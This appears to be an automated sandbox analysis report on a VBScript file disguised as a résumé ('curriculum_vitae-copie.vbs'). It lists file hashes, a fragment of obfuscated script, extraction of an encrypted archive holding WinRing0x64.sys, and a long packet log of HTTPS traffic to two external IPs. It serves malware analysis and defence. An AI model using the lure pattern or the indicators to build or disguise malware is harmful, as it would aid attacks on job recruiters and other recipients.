SSDEEP:	6:AMKvMiPjMZHcAxXF2SaieaHUXomWmeST3aHiLAieaHinFsCgN42+l5kkbToQF2QW:pRrdRwy6TjELnFs4kk3oQ/fRAI0VtND
MD5:	444F96CC6A41A0922194C547A9188ACE
SHA1:	B9125D1F6357D93F8DD790F2A0A8AA528C797659
SHA-256:	9979A8D428BCD7B4AEA33E1FA01D4DE4FAD21E0B7234FE6D6EDFA6492B3F3B7C
SHA-512:	4E66FBD9ABD15E0A1C22A964D9688E272C143A789E474410D9A4092000B5DA0BE082890D3F183BF82DA2A8CE5019AF0497CE3B2D9A3DD85316923A6277C71A21
Malicious:	false
Preview:	..7-Zip (r) 23.01 (x86) : Igor Pavlov : Public domain : 2023-06-20....Scanning the drive for archives:.. 0M Scan C:\Users\Public\. .1 file, 1960640 bytes (1915 KiB)....Extracting archive: C:\Users\Public\gmail.7z..--..Path = C:\Users\Public\gmail.7z..Type = 7z..Physical Size = 1960640..Headers Size = 544..Method = LZMA2:6m BCJ 7zAES..Solid = +..Blocks = 6.... 0%. . 88% 5 - WinRing0x64.sys. .Everything is Ok....Files: 8..Size: 5426150..Compressed: 1960640..

Static File Info

General

File type:	assembler source, ASCII text, with very long lines (51497)
Entropy (8bit):	0.5652510677628565
TrID:	Visual Basic Script (13500/0) 100.00%
File name:	curriculum_vitae-copie.vbs
File size:	282'539 bytes
MD5:	7eb1457ada651aea9840c8017d502c96
SHA1:	9d3dabcd49b3d44389787ad0cdd2309a683bbb58
SHA256:	088d248eeef4cbdda4fc766c4daf16173d66e05c32b3a1802d18a6e4dc208850
SHA512:	596bb0da358ff3e06df8ece75cd6704cc591655ca28b5c8cdad316ad2ca7e1770ba32ee53c3ba1fdb13aec20fee062be048f94e9cab4717e2c192e702b395be7
SSDEEP:	384:Akz9oZhj3sn2VE9oYUDO3fNFEzI6PdfOD7M5nE7/eD:nKgn2VEGYaO3fNKzXU7Mm7/eD
TLSH:	065407C75C809624C793A0B9C17FA2303794D8B9B754B125D871B084AF5EE68E32DEE7
File Content Preview:	L5Z0wNYjD4KL5 = FormatNumber(49,17)...L5f23qN4NWqL5 = Sin(41).L5Y7ttZzWvqL5 = Sin(43).L5k8MhhceVesL5 = Sin(12).L5Z8PvaeCSL5 = CSng(78).L5a7ZWkFodzoL5 = CSng(5).L5b3RWgKG7sEL5 = CSng(81)...L5KaozF0hj4iL5 = CInt(55).L5s8s9JzYL5 = CInt(62).L5i3CWBsXuuL5 = He

File Icon


Icon Hash:	68d69b8f86ab9a86

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 4, 2024 08:49:28.381699085 CET	49706	443	192.168.2.6	49.12.202.237
Jan 4, 2024 08:49:28.381746054 CET	443	49706	49.12.202.237	192.168.2.6
Jan 4, 2024 08:49:28.381824970 CET	49706	443	192.168.2.6	49.12.202.237
Jan 4, 2024 08:49:28.405791044 CET	49706	443	192.168.2.6	49.12.202.237
Jan 4, 2024 08:49:28.405812025 CET	443	49706	49.12.202.237	192.168.2.6
Jan 4, 2024 08:49:28.788851023 CET	443	49706	49.12.202.237	192.168.2.6
Jan 4, 2024 08:49:28.789015055 CET	49706	443	192.168.2.6	49.12.202.237
Jan 4, 2024 08:49:28.859874010 CET	49706	443	192.168.2.6	49.12.202.237
Jan 4, 2024 08:49:28.859901905 CET	443	49706	49.12.202.237	192.168.2.6
Jan 4, 2024 08:49:28.860263109 CET	443	49706	49.12.202.237	192.168.2.6
Jan 4, 2024 08:49:28.860327959 CET	49706	443	192.168.2.6	49.12.202.237
Jan 4, 2024 08:49:28.862957001 CET	49706	443	192.168.2.6	49.12.202.237
Jan 4, 2024 08:49:28.904743910 CET	443	49706	49.12.202.237	192.168.2.6
Jan 4, 2024 08:49:29.341053963 CET	443	49706	49.12.202.237	192.168.2.6
Jan 4, 2024 08:49:29.341084957 CET	443	49706	49.12.202.237	192.168.2.6
Jan 4, 2024 08:49:29.341099024 CET	443	49706	49.12.202.237	192.168.2.6
Jan 4, 2024 08:49:29.341190100 CET	49706	443	192.168.2.6	49.12.202.237
Jan 4, 2024 08:49:29.341207981 CET	443	49706	49.12.202.237	192.168.2.6
Jan 4, 2024 08:49:29.341243982 CET	49706	443	192.168.2.6	49.12.202.237
Jan 4, 2024 08:49:29.341272116 CET	49706	443	192.168.2.6	49.12.202.237
Jan 4, 2024 08:49:29.341878891 CET	443	49706	49.12.202.237	192.168.2.6
Jan 4, 2024 08:49:29.341898918 CET	443	49706	49.12.202.237	192.168.2.6
Jan 4, 2024 08:49:29.341943026 CET	49706	443	192.168.2.6	49.12.202.237
Jan 4, 2024 08:49:29.341950893 CET	443	49706	49.12.202.237	192.168.2.6
Jan 4, 2024 08:49:29.341989040 CET	49706	443	192.168.2.6	49.12.202.237
Jan 4, 2024 08:49:29.342005014 CET	49706	443	192.168.2.6	49.12.202.237
Jan 4, 2024 08:49:29.527455091 CET	443	49706	49.12.202.237	192.168.2.6
Jan 4, 2024 08:49:29.527477980 CET	443	49706	49.12.202.237	192.168.2.6
Jan 4, 2024 08:49:29.527590990 CET	49706	443	192.168.2.6	49.12.202.237
Jan 4, 2024 08:49:29.527621984 CET	443	49706	49.12.202.237	192.168.2.6
Jan 4, 2024 08:49:29.527672052 CET	49706	443	192.168.2.6	49.12.202.237
Jan 4, 2024 08:49:29.527935028 CET	443	49706	49.12.202.237	192.168.2.6
Jan 4, 2024 08:49:29.527954102 CET	443	49706	49.12.202.237	192.168.2.6
Jan 4, 2024 08:49:29.527997017 CET	49706	443	192.168.2.6	49.12.202.237
Jan 4, 2024 08:49:29.528007030 CET	443	49706	49.12.202.237	192.168.2.6
Jan 4, 2024 08:49:29.528074026 CET	49706	443	192.168.2.6	49.12.202.237
Jan 4, 2024 08:49:29.528270006 CET	443	49706	49.12.202.237	192.168.2.6
Jan 4, 2024 08:49:29.528310061 CET	443	49706	49.12.202.237	192.168.2.6
Jan 4, 2024 08:49:29.528322935 CET	49706	443	192.168.2.6	49.12.202.237
Jan 4, 2024 08:49:29.528340101 CET	443	49706	49.12.202.237	192.168.2.6
Jan 4, 2024 08:49:29.528358936 CET	49706	443	192.168.2.6	49.12.202.237
Jan 4, 2024 08:49:29.528368950 CET	49706	443	192.168.2.6	49.12.202.237
Jan 4, 2024 08:49:29.714554071 CET	443	49706	49.12.202.237	192.168.2.6
Jan 4, 2024 08:49:29.714576960 CET	443	49706	49.12.202.237	192.168.2.6
Jan 4, 2024 08:49:29.714622974 CET	49706	443	192.168.2.6	49.12.202.237
Jan 4, 2024 08:49:29.714648962 CET	443	49706	49.12.202.237	192.168.2.6
Jan 4, 2024 08:49:29.714664936 CET	49706	443	192.168.2.6	49.12.202.237
Jan 4, 2024 08:49:29.714690924 CET	49706	443	192.168.2.6	49.12.202.237
Jan 4, 2024 08:49:29.715574026 CET	443	49706	49.12.202.237	192.168.2.6
Jan 4, 2024 08:49:29.715591908 CET	443	49706	49.12.202.237	192.168.2.6
Jan 4, 2024 08:49:29.715645075 CET	49706	443	192.168.2.6	49.12.202.237
Jan 4, 2024 08:49:29.715657949 CET	443	49706	49.12.202.237	192.168.2.6
Jan 4, 2024 08:49:29.715697050 CET	49706	443	192.168.2.6	49.12.202.237
Jan 4, 2024 08:49:29.716547966 CET	443	49706	49.12.202.237	192.168.2.6
Jan 4, 2024 08:49:29.716562986 CET	443	49706	49.12.202.237	192.168.2.6
Jan 4, 2024 08:49:29.716608047 CET	49706	443	192.168.2.6	49.12.202.237
Jan 4, 2024 08:49:29.716615915 CET	443	49706	49.12.202.237	192.168.2.6
Jan 4, 2024 08:49:29.716630936 CET	49706	443	192.168.2.6	49.12.202.237
Jan 4, 2024 08:49:29.716646910 CET	49706	443	192.168.2.6	49.12.202.237
Jan 4, 2024 08:49:29.717495918 CET	443	49706	49.12.202.237	192.168.2.6
Jan 4, 2024 08:49:29.717513084 CET	443	49706	49.12.202.237	192.168.2.6
Jan 4, 2024 08:49:29.717572927 CET	49706	443	192.168.2.6	49.12.202.237
Jan 4, 2024 08:49:29.717582941 CET	443	49706	49.12.202.237	192.168.2.6
Jan 4, 2024 08:49:29.717621088 CET	49706	443	192.168.2.6	49.12.202.237
Jan 4, 2024 08:49:29.718532085 CET	443	49706	49.12.202.237	192.168.2.6
Jan 4, 2024 08:49:29.718548059 CET	443	49706	49.12.202.237	192.168.2.6
Jan 4, 2024 08:49:29.718596935 CET	49706	443	192.168.2.6	49.12.202.237
Jan 4, 2024 08:49:29.718605042 CET	443	49706	49.12.202.237	192.168.2.6
Jan 4, 2024 08:49:29.718638897 CET	49706	443	192.168.2.6	49.12.202.237
Jan 4, 2024 08:49:29.719312906 CET	443	49706	49.12.202.237	192.168.2.6
Jan 4, 2024 08:49:29.719330072 CET	443	49706	49.12.202.237	192.168.2.6
Jan 4, 2024 08:49:29.719372988 CET	49706	443	192.168.2.6	49.12.202.237
Jan 4, 2024 08:49:29.719379902 CET	443	49706	49.12.202.237	192.168.2.6
Jan 4, 2024 08:49:29.719405890 CET	49706	443	192.168.2.6	49.12.202.237
Jan 4, 2024 08:49:29.719417095 CET	49706	443	192.168.2.6	49.12.202.237
Jan 4, 2024 08:49:29.899837971 CET	443	49706	49.12.202.237	192.168.2.6
Jan 4, 2024 08:49:29.899863958 CET	443	49706	49.12.202.237	192.168.2.6
Jan 4, 2024 08:49:29.900007010 CET	49706	443	192.168.2.6	49.12.202.237
Jan 4, 2024 08:49:29.900031090 CET	443	49706	49.12.202.237	192.168.2.6
Jan 4, 2024 08:49:29.900082111 CET	49706	443	192.168.2.6	49.12.202.237
Jan 4, 2024 08:49:29.901056051 CET	443	49706	49.12.202.237	192.168.2.6
Jan 4, 2024 08:49:29.901077032 CET	443	49706	49.12.202.237	192.168.2.6
Jan 4, 2024 08:49:29.901149988 CET	49706	443	192.168.2.6	49.12.202.237
Jan 4, 2024 08:49:29.901159048 CET	443	49706	49.12.202.237	192.168.2.6
Jan 4, 2024 08:49:29.901201963 CET	49706	443	192.168.2.6	49.12.202.237
Jan 4, 2024 08:49:29.901868105 CET	443	49706	49.12.202.237	192.168.2.6
Jan 4, 2024 08:49:29.901885033 CET	443	49706	49.12.202.237	192.168.2.6
Jan 4, 2024 08:49:29.901985884 CET	49706	443	192.168.2.6	49.12.202.237
Jan 4, 2024 08:49:29.901993036 CET	443	49706	49.12.202.237	192.168.2.6
Jan 4, 2024 08:49:29.902040958 CET	49706	443	192.168.2.6	49.12.202.237
Jan 4, 2024 08:49:29.902837992 CET	443	49706	49.12.202.237	192.168.2.6
Jan 4, 2024 08:49:29.902856112 CET	443	49706	49.12.202.237	192.168.2.6
Jan 4, 2024 08:49:29.902921915 CET	49706	443	192.168.2.6	49.12.202.237
Jan 4, 2024 08:49:29.902930021 CET	443	49706	49.12.202.237	192.168.2.6
Jan 4, 2024 08:49:29.902968884 CET	49706	443	192.168.2.6	49.12.202.237
Jan 4, 2024 08:49:29.903676033 CET	443	49706	49.12.202.237	192.168.2.6
Jan 4, 2024 08:49:29.903693914 CET	443	49706	49.12.202.237	192.168.2.6
Jan 4, 2024 08:49:29.903749943 CET	49706	443	192.168.2.6	49.12.202.237
Jan 4, 2024 08:49:29.903758049 CET	443	49706	49.12.202.237	192.168.2.6
Jan 4, 2024 08:49:29.903798103 CET	49706	443	192.168.2.6	49.12.202.237
Jan 4, 2024 08:49:29.904489994 CET	443	49706	49.12.202.237	192.168.2.6
Jan 4, 2024 08:49:29.904505968 CET	443	49706	49.12.202.237	192.168.2.6
Jan 4, 2024 08:49:29.904576063 CET	49706	443	192.168.2.6	49.12.202.237
Jan 4, 2024 08:49:29.904582977 CET	443	49706	49.12.202.237	192.168.2.6
Jan 4, 2024 08:49:29.904618979 CET	49706	443	192.168.2.6	49.12.202.237
Jan 4, 2024 08:49:29.905258894 CET	443	49706	49.12.202.237	192.168.2.6
Jan 4, 2024 08:49:29.905273914 CET	443	49706	49.12.202.237	192.168.2.6
Jan 4, 2024 08:49:29.905339003 CET	49706	443	192.168.2.6	49.12.202.237
Jan 4, 2024 08:49:29.905350924 CET	443	49706	49.12.202.237	192.168.2.6
Jan 4, 2024 08:49:29.905392885 CET	49706	443	192.168.2.6	49.12.202.237
Jan 4, 2024 08:49:29.906040907 CET	443	49706	49.12.202.237	192.168.2.6
Jan 4, 2024 08:49:29.906055927 CET	443	49706	49.12.202.237	192.168.2.6
Jan 4, 2024 08:49:29.906125069 CET	49706	443	192.168.2.6	49.12.202.237
Jan 4, 2024 08:49:29.906131983 CET	443	49706	49.12.202.237	192.168.2.6
Jan 4, 2024 08:49:29.906173944 CET	49706	443	192.168.2.6	49.12.202.237
Jan 4, 2024 08:49:29.906922102 CET	443	49706	49.12.202.237	192.168.2.6
Jan 4, 2024 08:49:29.906938076 CET	443	49706	49.12.202.237	192.168.2.6
Jan 4, 2024 08:49:29.906992912 CET	49706	443	192.168.2.6	49.12.202.237
Jan 4, 2024 08:49:29.907000065 CET	443	49706	49.12.202.237	192.168.2.6
Jan 4, 2024 08:49:29.907037973 CET	49706	443	192.168.2.6	49.12.202.237
Jan 4, 2024 08:49:29.907753944 CET	443	49706	49.12.202.237	192.168.2.6
Jan 4, 2024 08:49:29.907773972 CET	443	49706	49.12.202.237	192.168.2.6
Jan 4, 2024 08:49:29.907859087 CET	49706	443	192.168.2.6	49.12.202.237
Jan 4, 2024 08:49:29.907875061 CET	443	49706	49.12.202.237	192.168.2.6
Jan 4, 2024 08:49:29.907912016 CET	49706	443	192.168.2.6	49.12.202.237
Jan 4, 2024 08:49:29.908561945 CET	443	49706	49.12.202.237	192.168.2.6
Jan 4, 2024 08:49:29.908576965 CET	443	49706	49.12.202.237	192.168.2.6
Jan 4, 2024 08:49:29.908638954 CET	49706	443	192.168.2.6	49.12.202.237
Jan 4, 2024 08:49:29.908647060 CET	443	49706	49.12.202.237	192.168.2.6
Jan 4, 2024 08:49:29.908689976 CET	49706	443	192.168.2.6	49.12.202.237
Jan 4, 2024 08:49:29.909297943 CET	443	49706	49.12.202.237	192.168.2.6
Jan 4, 2024 08:49:29.909315109 CET	443	49706	49.12.202.237	192.168.2.6
Jan 4, 2024 08:49:29.909370899 CET	49706	443	192.168.2.6	49.12.202.237
Jan 4, 2024 08:49:29.909380913 CET	443	49706	49.12.202.237	192.168.2.6
Jan 4, 2024 08:49:29.909414053 CET	49706	443	192.168.2.6	49.12.202.237
Jan 4, 2024 08:49:29.910280943 CET	443	49706	49.12.202.237	192.168.2.6
Jan 4, 2024 08:49:29.910303116 CET	443	49706	49.12.202.237	192.168.2.6
Jan 4, 2024 08:49:29.910355091 CET	49706	443	192.168.2.6	49.12.202.237
Jan 4, 2024 08:49:29.910362005 CET	443	49706	49.12.202.237	192.168.2.6
Jan 4, 2024 08:49:29.910396099 CET	49706	443	192.168.2.6	49.12.202.237
Jan 4, 2024 08:49:30.087580919 CET	443	49706	49.12.202.237	192.168.2.6
Jan 4, 2024 08:49:30.087605000 CET	443	49706	49.12.202.237	192.168.2.6
Jan 4, 2024 08:49:30.087692022 CET	49706	443	192.168.2.6	49.12.202.237
Jan 4, 2024 08:49:30.087723017 CET	443	49706	49.12.202.237	192.168.2.6
Jan 4, 2024 08:49:30.087784052 CET	49706	443	192.168.2.6	49.12.202.237
Jan 4, 2024 08:49:30.088399887 CET	443	49706	49.12.202.237	192.168.2.6
Jan 4, 2024 08:49:30.088421106 CET	443	49706	49.12.202.237	192.168.2.6
Jan 4, 2024 08:49:30.088462114 CET	49706	443	192.168.2.6	49.12.202.237
Jan 4, 2024 08:49:30.088470936 CET	443	49706	49.12.202.237	192.168.2.6
Jan 4, 2024 08:49:30.088499069 CET	49706	443	192.168.2.6	49.12.202.237
Jan 4, 2024 08:49:30.088510990 CET	49706	443	192.168.2.6	49.12.202.237
Jan 4, 2024 08:49:30.089124918 CET	443	49706	49.12.202.237	192.168.2.6
Jan 4, 2024 08:49:30.089139938 CET	443	49706	49.12.202.237	192.168.2.6
Jan 4, 2024 08:49:30.089199066 CET	49706	443	192.168.2.6	49.12.202.237
Jan 4, 2024 08:49:30.089209080 CET	443	49706	49.12.202.237	192.168.2.6
Jan 4, 2024 08:49:30.089252949 CET	49706	443	192.168.2.6	49.12.202.237
Jan 4, 2024 08:49:30.089838028 CET	443	49706	49.12.202.237	192.168.2.6
Jan 4, 2024 08:49:30.089853048 CET	443	49706	49.12.202.237	192.168.2.6
Jan 4, 2024 08:49:30.089901924 CET	49706	443	192.168.2.6	49.12.202.237
Jan 4, 2024 08:49:30.089910030 CET	443	49706	49.12.202.237	192.168.2.6
Jan 4, 2024 08:49:30.089966059 CET	49706	443	192.168.2.6	49.12.202.237
Jan 4, 2024 08:49:30.090744019 CET	443	49706	49.12.202.237	192.168.2.6
Jan 4, 2024 08:49:30.090759993 CET	443	49706	49.12.202.237	192.168.2.6
Jan 4, 2024 08:49:30.090820074 CET	49706	443	192.168.2.6	49.12.202.237
Jan 4, 2024 08:49:30.090826988 CET	443	49706	49.12.202.237	192.168.2.6
Jan 4, 2024 08:49:30.090867996 CET	49706	443	192.168.2.6	49.12.202.237
Jan 4, 2024 08:49:30.091450930 CET	443	49706	49.12.202.237	192.168.2.6
Jan 4, 2024 08:49:30.091471910 CET	443	49706	49.12.202.237	192.168.2.6
Jan 4, 2024 08:49:30.091526985 CET	49706	443	192.168.2.6	49.12.202.237
Jan 4, 2024 08:49:30.091535091 CET	443	49706	49.12.202.237	192.168.2.6
Jan 4, 2024 08:49:30.091577053 CET	49706	443	192.168.2.6	49.12.202.237
Jan 4, 2024 08:49:30.092293978 CET	443	49706	49.12.202.237	192.168.2.6
Jan 4, 2024 08:49:30.092310905 CET	443	49706	49.12.202.237	192.168.2.6
Jan 4, 2024 08:49:30.092366934 CET	49706	443	192.168.2.6	49.12.202.237
Jan 4, 2024 08:49:30.092375040 CET	443	49706	49.12.202.237	192.168.2.6
Jan 4, 2024 08:49:30.092416048 CET	49706	443	192.168.2.6	49.12.202.237
Jan 4, 2024 08:49:30.093027115 CET	443	49706	49.12.202.237	192.168.2.6
Jan 4, 2024 08:49:30.093050003 CET	443	49706	49.12.202.237	192.168.2.6
Jan 4, 2024 08:49:30.093091011 CET	49706	443	192.168.2.6	49.12.202.237
Jan 4, 2024 08:49:30.093097925 CET	443	49706	49.12.202.237	192.168.2.6
Jan 4, 2024 08:49:30.093127012 CET	49706	443	192.168.2.6	49.12.202.237
Jan 4, 2024 08:49:30.093144894 CET	49706	443	192.168.2.6	49.12.202.237
Jan 4, 2024 08:49:30.094130993 CET	443	49706	49.12.202.237	192.168.2.6
Jan 4, 2024 08:49:30.094155073 CET	443	49706	49.12.202.237	192.168.2.6
Jan 4, 2024 08:49:30.094199896 CET	49706	443	192.168.2.6	49.12.202.237
Jan 4, 2024 08:49:30.094209909 CET	443	49706	49.12.202.237	192.168.2.6
Jan 4, 2024 08:49:30.094228029 CET	49706	443	192.168.2.6	49.12.202.237
Jan 4, 2024 08:49:30.094248056 CET	49706	443	192.168.2.6	49.12.202.237
Jan 4, 2024 08:49:30.095213890 CET	443	49706	49.12.202.237	192.168.2.6
Jan 4, 2024 08:49:30.095232964 CET	443	49706	49.12.202.237	192.168.2.6
Jan 4, 2024 08:49:30.095307112 CET	49706	443	192.168.2.6	49.12.202.237
Jan 4, 2024 08:49:30.095319033 CET	443	49706	49.12.202.237	192.168.2.6
Jan 4, 2024 08:49:30.095360994 CET	49706	443	192.168.2.6	49.12.202.237
Jan 4, 2024 08:49:30.096169949 CET	443	49706	49.12.202.237	192.168.2.6
Jan 4, 2024 08:49:30.096187115 CET	443	49706	49.12.202.237	192.168.2.6
Jan 4, 2024 08:49:30.096236944 CET	49706	443	192.168.2.6	49.12.202.237
Jan 4, 2024 08:49:30.096245050 CET	443	49706	49.12.202.237	192.168.2.6
Jan 4, 2024 08:49:30.096286058 CET	49706	443	192.168.2.6	49.12.202.237
Jan 4, 2024 08:49:30.096900940 CET	443	49706	49.12.202.237	192.168.2.6
Jan 4, 2024 08:49:30.096950054 CET	443	49706	49.12.202.237	192.168.2.6
Jan 4, 2024 08:49:30.096977949 CET	49706	443	192.168.2.6	49.12.202.237
Jan 4, 2024 08:49:30.096981049 CET	443	49706	49.12.202.237	192.168.2.6
Jan 4, 2024 08:49:30.097007990 CET	49706	443	192.168.2.6	49.12.202.237
Jan 4, 2024 08:49:30.097024918 CET	49706	443	192.168.2.6	49.12.202.237
Jan 4, 2024 08:49:30.097280025 CET	49706	443	192.168.2.6	49.12.202.237
Jan 4, 2024 08:49:30.097294092 CET	443	49706	49.12.202.237	192.168.2.6
Jan 4, 2024 08:49:30.253602028 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:30.253648996 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:30.253726959 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:30.254292965 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:30.254307032 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:30.457220078 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:30.457319975 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:30.462440014 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:30.462455034 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:30.462707996 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:30.462766886 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:30.463479996 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:30.508744955 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:30.823070049 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:30.823128939 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:30.823149920 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:30.823199987 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:30.823218107 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:30.823236942 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:30.823242903 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:30.823252916 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:30.823271036 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:30.823298931 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:30.825006962 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:30.825057030 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:30.826160908 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:30.826210022 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:30.826306105 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:30.826349974 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:30.828423977 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:30.828480959 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:30.828490973 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:30.828525066 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:30.830631018 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:30.830673933 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:30.830687046 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:30.830733061 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:30.832967043 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:30.833014965 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:30.833028078 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:30.833075047 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:30.835088968 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:30.835136890 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:30.835154057 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:30.835191965 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:30.837244987 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:30.837296963 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:30.839462996 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:30.839509964 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:30.839519024 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:30.839550972 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:30.841664076 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:30.841742992 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:30.842113972 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:30.842170954 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:30.843949080 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:30.843997955 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:30.844007015 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:30.844044924 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:30.846285105 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:30.846342087 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:30.846357107 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:30.846399069 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:30.848297119 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:30.848354101 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:30.848366976 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:30.848412037 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:30.850451946 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:30.850493908 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:30.852665901 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:30.852724075 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:30.852762938 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:30.852808952 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:30.854899883 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:30.854954958 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:30.855030060 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:30.855071068 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:30.917740107 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:30.917824984 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:30.917850018 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:30.917897940 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:30.918521881 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:30.918591976 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:30.919641018 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:30.919714928 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:30.919727087 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:30.919776917 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:30.921874046 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:30.921942949 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:30.921951056 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:30.922004938 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:30.924181938 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:30.924278975 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:30.926268101 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:30.926338911 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:30.926347017 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:30.926402092 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:30.931231022 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:30.931333065 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:30.932936907 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:30.933029890 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:30.937437057 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:30.937530994 CET	49707	443	192.168.2.6	172.65.251.78
Jan 4, 2024 08:49:30.937540054 CET	443	49707	172.65.251.78	192.168.2.6
Jan 4, 2024 08:49:30.937580109 CET	49707	443	192.168.2.6	172.65.251.78
